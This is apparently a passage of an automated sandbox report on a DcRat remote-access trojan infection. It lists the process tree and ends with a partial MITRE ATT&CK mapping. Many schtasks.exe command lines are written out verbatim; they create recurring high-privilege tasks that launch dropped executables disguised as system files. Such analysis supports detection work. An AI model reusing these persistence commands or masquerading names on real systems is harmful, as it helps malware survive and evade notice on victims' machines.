schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Program Files\Internet Explorer\Registry.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\winNet\explorer.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\winNet\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\winNet\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3572

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\winNet\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2180

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2244
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 72D546C1C009FBAD33D0C62C335D404B
  2⤵
  - Loads dropped DLL
  PID:5196
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding D7827AE264A1B4E54F8084EDAAD5B4C7
  2⤵
  - Loads dropped DLL
  PID:5364
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 29076F552ABCCBE5E901A67AAD367FC1 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:5556
- - C:\Windows\SysWOW64\wevtutil.exe
    "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
    3⤵
    PID:5884
  - - C:\Windows\System32\wevtutil.exe
      "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
      4⤵
      PID:5832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4116

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2692

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5772

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5912

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4972

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5604

C:\winNet\explorer.exe
C:\winNet\explorer.exe
1⤵
- Executes dropped EXE
PID:4568
- C:\winNet\explorer.exe.exe
  "C:\winNet\explorer.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:5740
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  - Executes dropped EXE
  PID:2692

C:\Users\Default\SendTo\sppsvc.exe
C:\Users\Default\SendTo\sppsvc.exe
1⤵
- Executes dropped EXE
PID:5364
- C:\Users\Default\SendTo\sppsvc.exe.exe
  "C:\Users\Default\SendTo\sppsvc.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:2652
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  - Executes dropped EXE
  PID:2932

C:\Program Files\Internet Explorer\Registry.exe
"C:\Program Files\Internet Explorer\Registry.exe"
1⤵
- Executes dropped EXE
PID:3696
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  - Executes dropped EXE
  PID:4724
- C:\Program Files\Internet Explorer\Registry.exe.exe
  "C:\Program Files\Internet Explorer\Registry.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:3004

C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe
"C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe"
1⤵
- Executes dropped EXE
PID:4660
- C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe
  "C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:3156
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  - Executes dropped EXE
  PID:4252

C:\winNet\csrss.exe
C:\winNet\csrss.exe
1⤵
- Executes dropped EXE
PID:2012
- C:\winNet\csrss.exe.exe
  "C:\winNet\csrss.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:3220
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  - Executes dropped EXE
  PID:5964

C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe
"C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe"
1⤵
- Executes dropped EXE
PID:484
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  - Executes dropped EXE
  PID:2960
- C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe
  "C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:5172

C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe
"C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe"
1⤵
- Executes dropped EXE
PID:1296
- C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe
  "C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:1140
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  - Executes dropped EXE
  PID:3728

C:\Users\Admin\AppData\Local\msiexec.exe
C:\Users\Admin\AppData\Local\msiexec.exe
1⤵
- Executes dropped EXE
PID:5488

C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe
C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe
1⤵
- Executes dropped EXE
PID:5444
- C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe.exe
  "C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:1916
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  - Executes dropped EXE
  PID:3908

C:\winNet\explorer.exe
C:\winNet\explorer.exe
1⤵
- Executes dropped EXE
PID:5164
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  - Executes dropped EXE
  PID:2012
- C:\winNet\explorer.exe.exe
  "C:\winNet\explorer.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:1100

C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe
"C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe"
1⤵
- Executes dropped EXE
PID:4008
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  - Executes dropped EXE
  PID:5444
- C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe.exe
  "C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:2652

C:\winNet\winlogon.exe
C:\winNet\winlogon.exe
1⤵
- Executes dropped EXE
PID:5956
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  - Executes dropped EXE
  PID:3100
- C:\winNet\winlogon.exe.exe
  "C:\winNet\winlogon.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:5032

C:\Users\Default\SendTo\sppsvc.exe
C:\Users\Default\SendTo\sppsvc.exe
1⤵
- Executes dropped EXE
PID:720
- C:\Users\Default\SendTo\sppsvc.exe.exe
  "C:\Users\Default\SendTo\sppsvc.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:4972
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  - Executes dropped EXE
  PID:4576

C:\Program Files\Internet Explorer\Registry.exe
"C:\Program Files\Internet Explorer\Registry.exe"
1⤵
- Executes dropped EXE
PID:132
- C:\Program Files\Internet Explorer\Registry.exe.exe
  "C:\Program Files\Internet Explorer\Registry.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:1956
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  - Executes dropped EXE
  PID:1888

C:\DriversavessessionDlldhcp\Roblox.exe
C:\DriversavessessionDlldhcp\Roblox.exe
1⤵
- Executes dropped EXE
PID:3156

C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe
"C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe"
1⤵
- Executes dropped EXE
PID:4784
- C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe
  "C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:4948
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  - Executes dropped EXE
  PID:5312

C:\winNet\csrss.exe
C:\winNet\csrss.exe
1⤵
- Executes dropped EXE
PID:5856
- C:\winNet\csrss.exe.exe
  "C:\winNet\csrss.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:1992
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:1388

C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe
"C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe"
1⤵
- Executes dropped EXE
PID:3364
- C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe
  "C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe"
  2⤵
  PID:572
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:5656

C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe
"C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe"
1⤵
PID:5928
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:5340
- C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe
  "C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe"
  2⤵
  PID:5280

C:\Users\Admin\AppData\Local\msiexec.exe
C:\Users\Admin\AppData\Local\msiexec.exe
1⤵
PID:5016

C:\winNet\explorer.exe
C:\winNet\explorer.exe
1⤵
PID:2652
- C:\winNet\explorer.exe.exe
  "C:\winNet\explorer.exe.exe"
  2⤵
  PID:2976
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:4116

C:\Program Files\Internet Explorer\Registry.exe
"C:\Program Files\Internet Explorer\Registry.exe"
1⤵
PID:2356
- C:\Program Files\Internet Explorer\Registry.exe.exe
  "C:\Program Files\Internet Explorer\Registry.exe.exe"
  2⤵
  PID:2708
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:6084

C:\Users\Default\SendTo\sppsvc.exe
C:\Users\Default\SendTo\sppsvc.exe
1⤵
PID:5912
- C:\Users\Default\SendTo\sppsvc.exe.exe
  "C:\Users\Default\SendTo\sppsvc.exe.exe"
  2⤵
  PID:4288
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:3976

C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe
C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe
1⤵
PID:2460
- C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe.exe
  "C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe.exe"
  2⤵
  PID:2000
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:4624

C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe
"C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe"
1⤵
PID:3312
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:4376
- C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe
  "C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe"
  2⤵
  PID:6056

C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe
"C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe"
1⤵
PID:5572
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:1296
- C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe
  "C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe"
  2⤵
  PID:3884

C:\winNet\csrss.exe
C:\winNet\csrss.exe
1⤵
PID:5900
- C:\winNet\csrss.exe.exe
  "C:\winNet\csrss.exe.exe"
  2⤵
  PID:5280
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:5844

C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe
"C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe"
1⤵
PID:4296
- C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe
  "C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe"
  2⤵
  PID:5572
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:2392

C:\winNet\explorer.exe
C:\winNet\explorer.exe
1⤵
PID:1700
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:4660
- C:\winNet\explorer.exe.exe
  "C:\winNet\explorer.exe.exe"
  2⤵
  PID:4064

C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe
"C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe"
1⤵
PID:2600
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:4740
- C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe.exe
  "C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe.exe"
  2⤵
  PID:2372

C:\winNet\winlogon.exe
C:\winNet\winlogon.exe
1⤵
PID:3480
- C:\winNet\winlogon.exe.exe
  "C:\winNet\winlogon.exe.exe"
  2⤵
  PID:1460
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:4628

C:\Program Files\Internet Explorer\Registry.exe
"C:\Program Files\Internet Explorer\Registry.exe"
1⤵
PID:1928
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:3200
- C:\Program Files\Internet Explorer\Registry.exe.exe
  "C:\Program Files\Internet Explorer\Registry.exe.exe"
  2⤵
  PID:3540

C:\DriversavessessionDlldhcp\Roblox.exe
C:\DriversavessessionDlldhcp\Roblox.exe
1⤵
PID:2308

C:\Users\Default\SendTo\sppsvc.exe
C:\Users\Default\SendTo\sppsvc.exe
1⤵
PID:4708
- C:\Users\Default\SendTo\sppsvc.exe.exe
  "C:\Users\Default\SendTo\sppsvc.exe.exe"
  2⤵
  PID:2976
- C:\Users\Admin\AppData\Local\msiexec.exe
  "C:\Users\Admin\AppData\Local\msiexec.exe"
  2⤵
  PID:4716

C:\Users\Admin\AppData\Local\msiexec.exe
C:\Users\Admin\AppData\Local\msiexec.exe
1⤵
PID:6040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery